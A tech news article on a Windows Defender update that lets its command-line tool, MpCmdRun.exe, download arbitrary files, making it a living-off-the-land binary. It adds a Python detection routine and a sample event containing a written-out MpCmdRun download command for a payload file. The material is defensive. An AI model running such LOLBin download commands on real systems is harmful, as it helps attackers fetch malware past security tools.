Windows 10's built-in antivirus can now be used to download viruses

A recent update to the built-in antivirus software in Windows 10 has taught the program a new trick—how to download files through a command line tool, including nefarious ones (trojans, spyware, ransomware, and other malware).

Downloading malware is not the intended purpose, at least I presume that's not the case. But the new function could potentially be abused in such a manner. Fortunately, this is not something the typical home user needs to worry about, not unless they're a PC masochist (more on that in a moment).

This new ability was discovered by Mohammad Askar (via Bleeping Computer), a security penetration tester and instructor who has posted hundreds of security articles, according to his Udemy profile.

"Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line'," Askar stated on Twitter.

This effectively allows a local attacker to leverage Defender as what is called a living-off-the-land binary (LOLBin). That's when legitimate software is used for something malicious—in this case, using an antivirus program to download a virus.


It appears this new ability was added to Defender with the 4.18.2007.8 update in July, so the functionality has been there for nearly two months. Bleeping Computer tested the new download switch in the command line tool and was able to download the same WastedLocker ransomware that recently caused a ruckus with Garmin's infrastructure, which prompted the company to reportedly pay a multi-million dollar ransom.

This is not quite as careless as it may seem at first glance. For one, Defender will still scan files downloaded through this method, so in theory it should still protect against malware. And secondly, this would need to be initiated by a local user.

Nevertheless, this is something system administrators should be aware of, so they can take the proper precautions. It's not unheard of for a rogue employee to cause mischief, whether because they are disgruntled, on the verge of being fired, or for any other reason.
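One precaution is to watch process-creation telemetry for the Defender command line tool being launched with its download switch, since Defender's own maintenance tasks never need it. The routine below is an added example for this article, not code from Microsoft, Askar or Bleeping Computer; it assumes the switch is spelled -DownloadFile with -url and -path arguments, and the sample records are constructed, not real telemetry.

```python
import re
from typing import Optional

# Assumed spelling of the download switch and its arguments (not stated in the article).
DOWNLOAD_FLAG = re.compile(r"(?i)(?:^|\s)-DownloadFile\b")
URL_ARG = re.compile(r"(?i)-url\s+(\S+)")
PATH_ARG = re.compile(r'(?i)-path\s+("[^"]+"|\S+)')


def _arg(pattern: re.Pattern, cmd: str) -> str:
    """Pull one argument value out of the command line, or '?' if absent."""
    m = pattern.search(cmd)
    return m.group(1).strip('"') if m else "?"


def analyze(record: dict) -> Optional[dict]:
    """Return a finding when MpCmdRun.exe is invoked with the download switch.

    `record` mirrors a process-creation event (Sysmon Event ID 1 / Security 4688)
    with the keys Image, CommandLine, ParentImage and User. Any use of the switch
    is flagged regardless of the fetched file: Defender will still scan it, but the
    invocation itself is the LOLBin behaviour the article describes.
    """
    if not record.get("Image", "").lower().endswith("\\mpcmdrun.exe"):
        return None
    cmd = record.get("CommandLine", "")
    if not DOWNLOAD_FLAG.search(cmd):
        return None
    return {
        "rule": "defender_mpcmdrun_download_lolbin",
        "user": record.get("User", "?"),
        "parent": record.get("ParentImage", "?"),
        "url": _arg(URL_ARG, cmd),
        "dest": _arg(PATH_ARG, cmd),
    }


def scan(records: list) -> list:
    """Run analyze() over a batch of events and keep only the findings."""
    return [f for f in (analyze(r) for r in records) if f]


SAMPLE_RECORDS = [  # constructed sample events, not captured telemetry
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",
     "CommandLine": "MpCmdRun.exe -DownloadFile -url https://example.invalid/payload.bin "
                    "-path C:\\Users\\jdoe\\AppData\\Local\\Temp\\payload.bin"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "Image": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",
     "CommandLine": "MpCmdRun.exe -SignatureUpdate"},  # routine Defender task, must not fire
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f['rule']}] {f['user']} via {f['parent']} fetched {f['url']} -> {f['dest']}")
```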

Paul Lilly

Paul has been playing PC games and raking his knuckles on computer hardware since the Commodore 64. He does not have any tattoos, but thinks it would be cool to get one that reads LOAD"*",8,1. In his off time, he rides motorcycles and wrestles alligators (only one of those is true).
